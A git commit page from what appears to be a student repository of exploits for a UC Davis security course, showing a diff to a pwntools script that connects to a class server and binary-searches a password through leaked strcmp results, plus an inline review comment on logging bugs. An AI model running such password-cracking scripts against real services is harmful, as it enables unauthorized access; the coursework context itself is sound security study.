ucdavis-ecs189m

[RADIOACTIVE] python exploits for uc davis class ecs189m

commit b79f41c7bb49de00367b88be90d20dfa6fa7e12f
parent 21c132719de02ba86debc6b7f28bf1c9abd58375
Author: therealFIGBERT <figbertwelner@gmail.com>
Date:   Fri, 11 Oct 2019 08:46:06 -0700

Implementing pass repeat catch system

Diffstat:
Mthird_flag.py | 50+++++++++++++++++++++++++++-----------------------
1 file changed, 27 insertions(+), 23 deletions(-)

diff --git a/third_flag.py b/third_flag.py
@@ -23,31 +23,38 @@ def passgen(low: str, high: str) -> str:
 cracked = False
 len_limit = False
+first = True
 attempt = 1
 LO = "aaaaaaaaaaaaaaaaaaaa"
 HI = "zzzzzzzzzzzzzzzzzzzz"
 password = passgen(LO, HI)
 conn = remote("twinpeaks.cs.ucdavis.edu", 30004)
 print(conn.recv())
-while not len_limit and not cracked:
- conn.sendline(password)
- print("Attempt {}:\nPass sent as:\n{}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, password, LO, HI))
- attempt += 1
- response = conn.recvline_contains(b"strcmp")
- print("Server response:\n{}\n".format(response))
- previous_pass = password
- if b" -1 " in response:
- LO = password
- password = passgen(LO, HI)
- elif b" 1 " in response:
- HI = password
- password = passgen(LO, HI)
+while not cracked:
+ if first:
+ conn.sendline(password)
+ attempt += 1
+ print("Attempt {}:\nPass sent as:\n{}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, password, LO, HI))
+ first = False
 else:
- print("Password cracked as: {}".format(password))
- cracked = True
- conn.interactive()
- if password is previous_pass:
- len_limit = True
+ response = conn.recvline_contains(b"strcmp")
+ previous_pass = password
+ if b" -1 " in response:
+ LO = password
+ password = passgen(LO, HI)
+ elif b" 1 " in response:
+ HI = password
+ password = passgen(LO, HI)
+ else:
+ print("Password cracked as: {}".format(password))
+ cracked = True
+ conn.interactive()
+ if password == previous_pass:
+ break
+ print("Server response:\n{}\n".format(response))
+ conn.sendline(password)
+ print("Attempt {}:\nPass sent as:\n{}\nPrevious Pass: {}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, previous_pass, password, LO, HI))
+ attempt += 1
 start_pos = 0
 for b in range(len(LO)):
 if LO[b] is HI[b]:
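Review bot: The final `print` in the new `else` branch labels its values the wrong way round: the format string puts `Pass sent as` before `Previous Pass`, but the arguments are `previous_pass, password`, so the value just sent is logged under "Previous Pass"; it should end `.format(attempt, password, previous_pass, LO, HI)`. The `first` branch also runs `attempt += 1` before its `print`, so the first send is logged as attempt 2 and the next iteration prints 2 again; move the increment after the `print` there. `len_limit` is no longer read anywhere in the hunk and can be dropped, and the context line `if LO[b] is HI[b]:` still compares strings by identity although this commit moves the password check to `==`. Indentation is not visible in this rendering, so the nesting of the `if password == previous_pass:` check is inferred; if it sits at loop level, a converged search with no match leaves the loop without any message.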
@@ -55,7 +62,4 @@ for b in range(len(LO)):
 else:
 break
 pass_buffer = password[:start_pos]
-pass_end = password[start_pos:]
-print(password)
-print(pass_buffer)
-print(pass_end)
-\ No newline at end of file
+pass_end = password[start_pos:]
+\ No newline at end of file